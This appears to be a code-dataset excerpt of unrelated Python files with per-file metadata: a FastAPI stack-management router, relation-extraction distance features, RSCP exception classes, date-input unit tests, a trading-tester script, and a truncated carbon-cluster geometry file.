        stack_name=stack.stack_name,
        git_repo=stack.git_repo,
        branch=branch,
        environment=environment,
        squad=squad,
        name=name)
    # task[1]['variable'] maps variable name -> metadata; keep just the names
    variables_list = list(task[1]['variable'])
    try:
        # Persist stack data in the db
        result = crud_stacks.create_new_stack(
            db=db,
            stack=stack,
            user_id=current_user.id,
            task_id=task[0],
            var_json=task[1],
            var_list=variables_list,
            squad_access=stack.squad_access
        )
        crud_activity.create_activity_log(
            db=db,
            username=current_user.username,
            squad=current_user.squad,
            action=f'Create Stack {stack.stack_name}'
        )
        return result
    except Exception as err:
        # Any persistence failure is reported to the caller as a conflict
        raise HTTPException(status_code=409, detail=f"Duplicate entry {err}")
@router.patch("/{stack_id}", response_model=schemas.Stack)
def update_stack(
        stack_id: int,
        stack: schemas.StackCreate,
        current_user: schemas.User = Depends(deps.get_current_active_user),
        db: Session = Depends(deps.get_db)):
    """Update an existing stack (master users only).

    Re-validates the provider prefix, re-runs the git sync task to refresh
    the stack's variables, then updates the stored stack and writes an
    activity-log entry. Raises 403 for non-masters, 409 on a persistence
    failure.
    """
    if not current_user.master:
        raise HTTPException(status_code=403, detail="Not enough permissions")
    name = "default"
    environment = "default"
    squad = "squad"
    branch = stack.branch
    # Check that the providers encoded in the stack name are supported
    check_providers(stack_name=stack.stack_name)
    # NOTE(review): the lookup result was never used in the original code —
    # unlike create, update does not reject unknown or duplicate names.
    crud_stacks.get_stack_by_name(db, stack_name=stack.stack_name)
    # Push git task to queue squad; all workers are subscribed to this queue
    task = sync_git(
        stack_name=stack.stack_name,
        git_repo=stack.git_repo,
        branch=branch,
        environment=environment,
        squad=squad,
        name=name)
    # task[1]['variable'] maps variable name -> metadata; keep just the names
    variables_list = list(task[1]['variable'])
    try:
        # Persist stack data in the db
        result = crud_stacks.update_stack(
            db=db,
            stack_id=stack_id,
            stack=stack,
            user_id=current_user.id,
            task_id=task[0],
            var_json=task[1],
            var_list=variables_list,
            squad_access=stack.squad_access
        )
        crud_activity.create_activity_log(
            db=db,
            username=current_user.username,
            squad=current_user.squad,
            action=f'Update Stack {stack.stack_name}'
        )
        return result
    except Exception as err:
        # Any persistence failure is reported to the caller as a conflict
        raise HTTPException(status_code=409, detail=f"Duplicate entry {err}")
@router.get("/")
async def get_all_stacks(
        current_user: schemas.User = Depends(deps.get_current_active_user),
        skip: int = 0,
        limit: int = 100,
        db: Session = Depends(deps.get_db)):
    """Return a page of stacks visible to the caller.

    Master users see every stack; other users only the stacks granted to
    their squad. skip/limit paginate the result set.
    """
    if current_user.master:
        return crud_stacks.get_all_stacks(
            db=db, squad_access=current_user.squad, skip=skip, limit=limit)
    return crud_stacks.get_all_stacks_by_squad(
        db=db, squad_access=current_user.squad, skip=skip, limit=limit)
@router.get("/{stack}")
async def get_stack_by_id_or_name(
        stack,
        current_user: schemas.User = Depends(deps.get_current_active_user),
        db: Session = Depends(deps.get_db)):
    """Fetch a single stack by numeric id or by name.

    Raises 404 when the stack does not exist and 403 when the caller's
    squad is not in the stack's squad_access list (masters and a "*"
    wildcard entry bypass the squad check).
    """
    # A purely numeric path parameter is treated as an id, otherwise a name.
    # The original duplicated the None/permission checks in both branches.
    if stack.isdigit():
        result = crud_stacks.get_stack_by_id(db=db, stack_id=stack)
    else:
        result = crud_stacks.get_stack_by_name(db=db, stack_name=stack)
    if result is None:
        raise HTTPException(status_code=404, detail="stack id not found")
    if (current_user.squad not in result.squad_access
            and not current_user.master
            and "*" not in result.squad_access):
        raise HTTPException(status_code=403, detail="Not enough permissions")
    return result
@router.delete("/{stack}")
async def delete_stack_by_id_or_name(
        stack,
        current_user: schemas.User = Depends(deps.get_current_active_user),
        db: Session = Depends(deps.get_db)):
    """Delete one stack, addressed either by numeric id or by name.

    Bug fix: the original wrapped everything in `try/except Exception` and
    *returned* the exception, so the 404/403 HTTPExceptions raised inside
    were converted into 200 responses. Permission/lookup errors are now
    raised before the best-effort delete section.

    Raises:
        HTTPException 403: caller lacks the privilege flag or squad access.
        HTTPException 404: no stack matches `stack`.
    """
    if not current_user.privilege:
        raise HTTPException(
            status_code=403, detail="Not enough permissions")
    by_id = stack.isdigit()
    if by_id:
        result = crud_stacks.get_stack_by_id(db=db, stack_id=stack)
    else:
        result = crud_stacks.get_stack_by_name(db=db, stack_name=stack)
    if result is None:
        raise HTTPException(status_code=404, detail="stack id not found")
    # Master users bypass the squad check, and "*" in squad_access means public.
    if current_user.squad not in result.squad_access and not current_user.master and "*" not in result.squad_access:
        raise HTTPException(status_code=403, detail="Not enough permissions")
    try:
        crud_activity.create_activity_log(
            db=db,
            username=current_user.username,
            squad=current_user.squad,
            # Same audit strings as before: id path logs the id, name path the name.
            action=f'Delete Stack {result.id}' if by_id else f'Delete Stack {result.stack_name}'
        )
        if by_id:
            return crud_stacks.delete_stack_by_id(db=db, stack_id=stack)
        return crud_stacks.delete_stack_by_name(db=db, stack_name=stack)
    except Exception as err:
        # NOTE(review): legacy best-effort behavior kept for *unexpected*
        # errors only — consider raising HTTPException(500) instead.
        return err
| 37.803191
| 124
| 0.660335
| 934
| 7,107
| 4.799786
| 0.122056
| 0.071158
| 0.07495
| 0.087441
| 0.856792
| 0.840732
| 0.810172
| 0.810172
| 0.798126
| 0.785412
| 0
| 0.009826
| 0.255382
| 7,107
| 187
| 125
| 38.005348
| 0.837302
| 0.043478
| 0
| 0.714286
| 0
| 0
| 0.073796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012422
| false
| 0
| 0.055901
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
061ad66bb9809acdbb52bf98c74869e3a3c00525
| 1,737
|
py
|
Python
|
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
import numpy as np
def distanceCDfar(c):
    """Word-gap between the chemical and disease mentions of candidate c,
    scaled down by 5000 (larger gap -> larger score)."""
    chem_s, chem_e = c.chemical.get_word_start(), c.chemical.get_word_end()
    dis_s, dis_e = c.disease.get_word_start(), c.disease.get_word_end()
    # Whichever mention comes first, measure from its end to the other's start.
    gap = (chem_s - dis_e) if dis_s < chem_s else (dis_s - chem_e)
    return gap / 5000
def distanceCD(c):
    """Proximity score of the chemical/disease mentions of candidate c:
    (5000 - word_gap) / 5000, so closer mentions score higher."""
    chem_s, chem_e = c.chemical.get_word_start(), c.chemical.get_word_end()
    dis_s, dis_e = c.disease.get_word_start(), c.disease.get_word_end()
    # Whichever mention comes first, measure from its end to the other's start.
    gap = (chem_s - dis_e) if dis_s < chem_s else (dis_s - chem_e)
    return (5000 - gap) / 5000
def distanceCD_(c, l):
    """Proximity score for the closest word of `l` appearing between the
    {{A}} (chemical) and {{B}} (disease) tags of candidate c.

    Returns (5000 - max_dist) / 5000 over all matching words, or 0 when no
    word in `l` matches.
    """
    # Robustness: this module only imports numpy at top level; import re
    # locally so the function works even outside the injecting framework.
    import re
    dists = []
    for w in l:
        pattern = r'({{A}})(.*)(' + w + r')(.*)({{B}})'
        match = re.search(pattern, get_tagged_text(c), flags=re.I)
        if match:
            # Distance = shorter of the two context spans around the word.
            dists.append(min(len(g) for g in match.group(2, 4)))
    if dists:
        return (5000 - max(dists)) / 5000
    return 0
def distanceDC_(c, l):
    """Mirror of distanceCD_ for the reversed order: word of `l` appearing
    between the {{B}} (disease) and {{A}} (chemical) tags of candidate c.

    Returns (5000 - max_dist) / 5000 over all matching words, or 0 when no
    word in `l` matches.
    """
    # Robustness: this module only imports numpy at top level; import re
    # locally so the function works even outside the injecting framework.
    import re
    dists = []
    for w in l:
        pattern = r'({{B}})(.*)(' + w + r')(.*)({{A}})'
        match = re.search(pattern, get_tagged_text(c), flags=re.I)
        if match:
            # Distance = shorter of the two context spans around the word.
            dists.append(min(len(g) for g in match.group(2, 4)))
    if dists:
        return (5000 - max(dists)) / 5000
    return 0
def distanceDevFol(c):
    """Score the pattern 'develop ... {{B}} ... following ... {{A}}' in the
    tagged text of candidate c.

    Distance is the shortest of the three gap spans; defaults to 1000 when
    the pattern is absent. Returns (5000 - dist) / 5000.
    """
    # Robustness: this module only imports numpy at top level; import re
    # locally so the function works even outside the injecting framework.
    import re
    dist = 1000
    match = re.search(r'(develop)(.*)({{B}})(.*)(following)(.*)({{A}})', get_tagged_text(c), flags=re.I)
    if match:
        dist = min(len(g) for g in match.group(2, 4, 6))
    return (5000 - dist) / 5000
| 32.166667
| 107
| 0.592976
| 261
| 1,737
| 3.754789
| 0.203065
| 0.057143
| 0.04898
| 0.065306
| 0.863265
| 0.820408
| 0.820408
| 0.820408
| 0.793878
| 0.75102
| 0
| 0.040243
| 0.241796
| 1,737
| 54
| 108
| 32.166667
| 0.703872
| 0
| 0
| 0.729167
| 0
| 0
| 0.054085
| 0.026467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104167
| false
| 0
| 0.020833
| 0
| 0.270833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0626bdcfa5ddac4517acac3468288126ed43d15a
| 826
|
py
|
Python
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 4
|
2020-10-12T13:36:03.000Z
|
2020-12-23T11:53:06.000Z
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 1
|
2020-11-22T19:36:38.000Z
|
2020-12-01T22:03:53.000Z
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 3
|
2019-12-19T17:37:37.000Z
|
2021-12-04T18:47:43.000Z
|
from logging import Logger
class RSCPFrameError(Exception):
    """Error in an RSCP frame.

    Fix: the original never called Exception.__init__, so str(exc) was empty
    and exc.args was (); the message is now stored on the exception as well
    as being logged.
    """
    def __init__(self, message: str, logger: Logger):
        if message is None:
            message = self.__class__.__name__
        super().__init__(message)
        logger.exception(message)
class RSCPDataError(Exception):
    """Error in RSCP payload data.

    Fix: the original never called Exception.__init__, so str(exc) was empty
    and exc.args was (); the message is now stored on the exception as well
    as being logged.
    """
    def __init__(self, message: str, logger: Logger):
        if message is None:
            message = self.__class__.__name__
        super().__init__(message)
        logger.exception(message)
class RSCPAuthenticationError(Exception):
    """RSCP authentication failure.

    Fix: the original never called Exception.__init__, so str(exc) was empty
    and exc.args was (); the message is now stored on the exception as well
    as being logged.
    """
    def __init__(self, message: str, logger: Logger):
        if message is None:
            message = self.__class__.__name__
        super().__init__(message)
        logger.exception(message)
class RSCPCommunicationError(Exception):
    """RSCP transport/communication failure.

    Fix: the original never called Exception.__init__, so str(exc) was empty
    and exc.args was (); the message is now stored on the exception as well
    as being logged. Also adds the `str` annotation for consistency with the
    sibling classes.
    """
    def __init__(self, message: str, logger: Logger):
        if message is None:
            message = self.__class__.__name__
        super().__init__(message)
        logger.exception(message)
| 27.533333
| 53
| 0.673123
| 87
| 826
| 5.83908
| 0.218391
| 0.094488
| 0.125984
| 0.15748
| 0.80315
| 0.75
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0
| 0.245763
| 826
| 29
| 54
| 28.482759
| 0.815409
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.047619
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0642e7a812ca4995cae9f13f939a06020f9dbb67
| 3,815
|
py
|
Python
|
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
import unittest
import datetime
from unittest.mock import patch
from src.booking_app.data_entry import input_date, input_past_date, input_future_date
class TestInputUtils(unittest.TestCase):
    """Unit tests for input_date / input_past_date / input_future_date.

    Each test patches builtins.input so the helper under test reads a
    canned string instead of prompting.
    """

    def _assert_dmy(self, value, day, month, year):
        # Shared check: value is a date with the expected day/month/year.
        self.assertTrue(isinstance(value, datetime.date))
        self.assertEqual(day, value.day)
        self.assertEqual(month, value.month)
        self.assertEqual(year, value.year)

    @patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
    def test_now_is_a_valid_date(self, _):
        # Could fail if the suite starts at midnight and the day rolls over;
        # treated as an unlikely edge case.
        today = datetime.datetime.now().date()
        self._assert_dmy(input_date(""), today.day, today.month, today.year)

    @patch("builtins.input", side_effect=["01/02/1970"])
    def test_historical_date_is_valid(self, _):
        self._assert_dmy(input_date(""), 1, 2, 1970)

    @patch("builtins.input", side_effect=["01/02/9999"])
    def test_future_date_is_valid(self, _):
        self._assert_dmy(input_date(""), 1, 2, 9999)

    @patch("builtins.input", side_effect=[" 01/02/2021 "])
    def test_leading_trailing_whitespace_is_ignored(self, _):
        self._assert_dmy(input_date(""), 1, 2, 2021)

    @patch("builtins.input", side_effect=[""])
    def test_empty_input_cancels(self, _):
        self.assertIsNone(input_date(""))

    @patch("builtins.input", side_effect=["This is not a date"])
    def test_invalid_date_errors(self, _):
        with self.assertRaises(ValueError):
            _ = input_date("")

    @patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
    def test_now_is_not_a_valid_past_date(self, _):
        # Could fail if the suite starts at midnight and the day rolls over;
        # treated as an unlikely edge case.
        with self.assertRaises(ValueError):
            _ = input_past_date("")

    @patch("builtins.input", side_effect=["01/02/9999"])
    def test_future_date_is_not_a_valid_past_date(self, _):
        with self.assertRaises(ValueError):
            _ = input_past_date("")

    @patch("builtins.input", side_effect=["01/02/1970"])
    def test_past_date_is_valid_past_date(self, _):
        self._assert_dmy(input_past_date(""), 1, 2, 1970)

    @patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
    def test_now_is_not_a_valid_future_date(self, _):
        # Could fail if the suite starts at midnight and the day rolls over;
        # treated as an unlikely edge case.
        with self.assertRaises(ValueError):
            _ = input_future_date("")

    @patch("builtins.input", side_effect=["01/02/1970"])
    def test_past_date_is_not_a_valid_future_date(self, _):
        with self.assertRaises(ValueError):
            _ = input_future_date("")

    @patch("builtins.input", side_effect=["01/02/9999"])
    def test_future_date_is_a_valid_future_date(self, _):
        self._assert_dmy(input_future_date(""), 1, 2, 9999)
| 41.467391
| 100
| 0.661599
| 519
| 3,815
| 4.630058
| 0.157996
| 0.066583
| 0.089888
| 0.109863
| 0.823138
| 0.795672
| 0.777778
| 0.741573
| 0.741573
| 0.726176
| 0
| 0.028486
| 0.20865
| 3,815
| 91
| 101
| 41.923077
| 0.767473
| 0.122412
| 0
| 0.597222
| 0
| 0
| 0.085004
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.166667
| false
| 0
| 0.055556
| 0
| 0.236111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
066754047c8e2323659f471b3eca642b4238725c
| 6,979
|
py
|
Python
|
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | 3
|
2021-07-12T10:50:26.000Z
|
2022-02-24T10:30:03.000Z
|
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | null | null | null |
tests/scripts/v1/ts_order_market.py
|
tradepython/pixiu
|
8f4639c2b3b620e641e5cd19842c007707f26e12
|
[
"Apache-2.0"
] | null | null | null |
# Integration-test script for market orders. Runs inside the pixiu tester,
# which injects the DSL names used below (Buy/Sell/GetOrder/assertEqual/...).
# NOTE(review): order of side effects matters throughout — each section
# queues a command, executes it, then inspects the resulting order.
point = SymbolInfo("point")
volume = 0.01
# Lock helpers must acquire and release cleanly.
assertEqual(AcquireLock("test"), True)
ReleaseLock("test")
score = 1.0
# --- Buy at market with default SL/TP ---
errid, result = Buy(volume=volume, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
errid, ret = WaitCommand(result['command_uid'])
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, 0)
assertEqual(order.take_profit, 0)
assertEqual(order.tags['score'], score)
# The order comment encodes either the command uid or the order uid.
if result['command_uid']:
    assertEqual(order.comment, f"cuid#{result['command_uid']}|")
else:
    assertEqual(order.comment, f"uid#{result['order_uid']}|")
# assertIsNone(order.magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
# --- Buy with explicit stop-loss and take-profit ---
stop_loss=Bid()-15*point
take_profit=Ask()+30*point
errid, result = Buy(volume=0.01, price=Ask(), stop_loss=stop_loss,
                    take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Buy passing every optional parameter ---
stop_loss=Bid()-15*point
take_profit=Ask()+30*point
magic_number=4291651
errid, result = Buy(volume=0.01, price=Ask(), stop_loss=stop_loss,
                    take_profit=take_profit, magic_number=magic_number,
                    symbol=Symbol(), slippage=3, arrow_color="white", tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertEqual(order.magic_number, magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Modify the open buy order (widen SL/TP) ---
stop_loss = stop_loss - 15 * point
take_profit = take_profit + 30 * point
errid, result = ModifyOrder(result['order_uid'], stop_loss=stop_loss, take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Close the buy order (buys close at Bid) ---
# errid, result = CloseOrder(result['order_uid'], price=Ask(), volume=volume)
errid, result = CloseOrder(result['order_uid'], tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertIsNotNone(order.close_time)
assertEqual(order.close_price, Bid())
assertEqual(order.tags['score'], score)
# The closed order must no longer appear among the open orders.
oo = GetOpenedOrderUIDs()
for t in oo:
    assertNotEqual(t, result['order_uid'])
# --- Sell at market with default SL/TP ---
errid, result = Sell(volume=0.01, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, 0)
assertEqual(order.take_profit, 0)
assertIsNone(order.magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Sell with explicit stop-loss and take-profit ---
stop_loss = Ask() + 15 * point
take_profit = Bid() - 30 * point
# NOTE(review): the call re-evaluates Ask()/Bid() rather than reusing the
# values above — assumes quotes don't move between the two evaluations.
errid, result = Sell(volume=0.01, price=Bid(), stop_loss=Ask()+15*point,
                     take_profit=Bid()-30*point, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Sell passing every optional parameter ---
magic_number=4291652
errid, result = Sell(volume=volume, price=Bid(), stop_loss=stop_loss,
                     take_profit=take_profit, magic_number=magic_number,
                     symbol=Symbol(), slippage=3, arrow_color="red", tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertEqual(order.magic_number, magic_number)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Modify the open sell order (widen SL/TP, mirrored signs) ---
stop_loss = stop_loss + 15 * point
take_profit = take_profit - 30 * point
errid, result = ModifyOrder(result['order_uid'], stop_loss=stop_loss, take_profit=take_profit, tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertEqual(order.uid, result['order_uid'])
assertEqual(order.volume, volume)
assertEqual(order.stop_loss, stop_loss)
assertEqual(order.take_profit, take_profit)
assertIsNone(order.close_time)
assertIsNone(order.close_price)
assertEqual(order.tags['score'], score)
# --- Close the sell order (sells close at Ask) ---
# errid, result = CloseOrder(result['order_uid'], price=Bid(), volume=volume)
errid, result = CloseOrder(result['order_uid'], tags={'score': score})
assertEqual(errid, 0)
assertNotEqual(result['order_uid'], None)
errid = exec_command()
assertEqual(errid, 0)
order = GetOrder(result['order_uid'])
assertIsNotNone(order)
assertEqual(order.symbol, Symbol())
assertIsNotNone(order.close_time)
assertEqual(order.close_price, Ask())
assertEqual(order.tags['score'], score)
# The closed order must no longer appear among the open orders.
oo = GetOpenedOrderUIDs()
for t in oo:
    assertNotEqual(t, result['order_uid'])
set_test_result("OK")
StopTester()
| 32.310185
| 117
| 0.762144
| 920
| 6,979
| 5.618478
| 0.080435
| 0.179532
| 0.100213
| 0.04024
| 0.922422
| 0.916618
| 0.903076
| 0.903076
| 0.903076
| 0.903076
| 0
| 0.012782
| 0.09199
| 6,979
| 216
| 118
| 32.310185
| 0.802904
| 0.045995
| 0
| 0.828729
| 0
| 0
| 0.076182
| 0.008281
| 0
| 0
| 0
| 0
| 0.662983
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0686d41acd2715d4d5c4f1db33d234d4cf0dd79e
| 8,024
|
py
|
Python
|
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/c142.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
import pulsar as psr
def load_ref_system():
    """ Returns the c142 carbon cluster geometry (142 atoms, Cartesian
        coordinates in the element-x-y-z format accepted by
        psr.make_system) as found in the IQMol fragment library.
        All credit to https://github.com/nutjunkie/IQmol
    """
    return psr.make_system("""
 C 4.24517 -2.31413 2.31413
 C 2.31413 -2.31413 4.24517
 C 2.31413 -4.24517 2.31413
 C 4.34594 -2.36585 -1.22556
 C 3.49086 -3.49086 1.72725
 C 2.68020 -2.68020 0.75831
 C 2.36585 -4.34594 -1.22556
 C 3.55361 -3.55361 -1.76286
 C 2.76040 -2.76040 -2.76040
 C 4.34594 1.22556 2.36585
 C 2.36585 1.22556 4.34594
 C 3.49086 -1.72725 3.49086
 C 2.68020 -0.75831 2.68020
 C 4.37229 -1.17118 1.17118
 C 4.37229 1.17118 -1.17118
 C 3.60803 0.03068 1.77090
 C 2.68504 0.85234 0.85234
 C 3.60803 -1.77090 -0.03068
 C 2.68504 -0.85234 -0.85234
 C 4.34594 -1.22556 -2.36585
 C 3.60803 -0.03068 -1.77090
 C 2.68020 0.75831 -2.68020
 C 3.55361 -1.76286 -3.55361
 C 2.36585 -1.22556 -4.34594
 C 3.55361 1.76286 3.55361
 C 2.76040 2.76040 2.76040
 C 4.34594 2.36585 1.22556
 C 3.55361 3.55361 1.76286
 C 2.36585 4.34594 1.22556
 C 3.60803 1.77090 0.03068
 C 2.68020 2.68020 -0.75831
 C 4.24517 2.31413 -2.31413
 C 3.49086 3.49086 -1.72725
 C 2.31413 4.24517 -2.31413
 C 3.49086 1.72725 -3.49086
 C 2.31413 2.31413 -4.24517
 C 1.72725 -3.49086 3.49086
 C 0.75831 -2.68020 2.68020
 C -1.22556 -2.36585 4.34594
 C -1.22556 -4.34594 2.36585
 C 1.17118 -4.37229 1.17118
 C 1.77090 -3.60803 -0.03068
 C 0.85234 -2.68504 -0.85234
 C -0.03068 -3.60803 1.77090
 C -0.85234 -2.68504 0.85234
 C -1.17118 -4.37229 -1.17118
 C 1.22556 -4.34594 -2.36585
 C 1.76286 -3.55361 -3.55361
 C 1.22556 -2.36585 -4.34594
 C 0.03068 -3.60803 -1.77090
 C -0.75831 -2.68020 -2.68020
 C 1.17118 -1.17118 4.37229
 C 1.77090 0.03068 3.60803
 C 0.85234 0.85234 2.68504
 C -1.17118 1.17118 4.37229
 C -0.03068 -1.77090 3.60803
 C -0.85234 -0.85234 2.68504
 C 1.73610 -1.73610 1.73610
 C 0.87307 -0.87307 0.87307
 C 1.77542 0.00000 -0.00000
 C 0.87307 0.87307 -0.87307
 C 0.00000 -0.00000 1.77542
 C -0.87307 0.87307 0.87307
 C 0.00000 -1.77542 -0.00000
 C -0.87307 -0.87307 -0.87307
 C 1.76728 -1.76728 -1.76728
 C 0.85234 -0.85234 -2.68504
 C 1.77090 -0.03068 -3.60803
 C 1.17118 1.17118 -4.37229
 C -0.00000 0.00000 -1.77542
 C -0.85234 0.85234 -2.68504
 C 0.03068 -1.77090 -3.60803
 C -1.17118 -1.17118 -4.37229
 C 1.22556 2.36585 4.34594
 C 1.76286 3.55361 3.55361
 C 1.22556 4.34594 2.36585
 C 0.03068 1.77090 3.60803
 C -0.75831 2.68020 2.68020
 C 1.76728 1.76728 1.76728
 C 0.85234 2.68504 0.85234
 C 1.77090 3.60803 0.03068
 C 1.17118 4.37229 -1.17118
 C 0.03068 3.60803 1.77090
 C -1.17118 4.37229 1.17118
 C -0.00000 1.77542 0.00000
 C -0.85234 2.68504 -0.85234
 C 1.73610 1.73610 -1.73610
 C 0.75831 2.68020 -2.68020
 C 1.72725 3.49086 -3.49086
 C -0.03068 3.60803 -1.77090
 C -1.22556 4.34594 -2.36585
 C -0.03068 1.77090 -3.60803
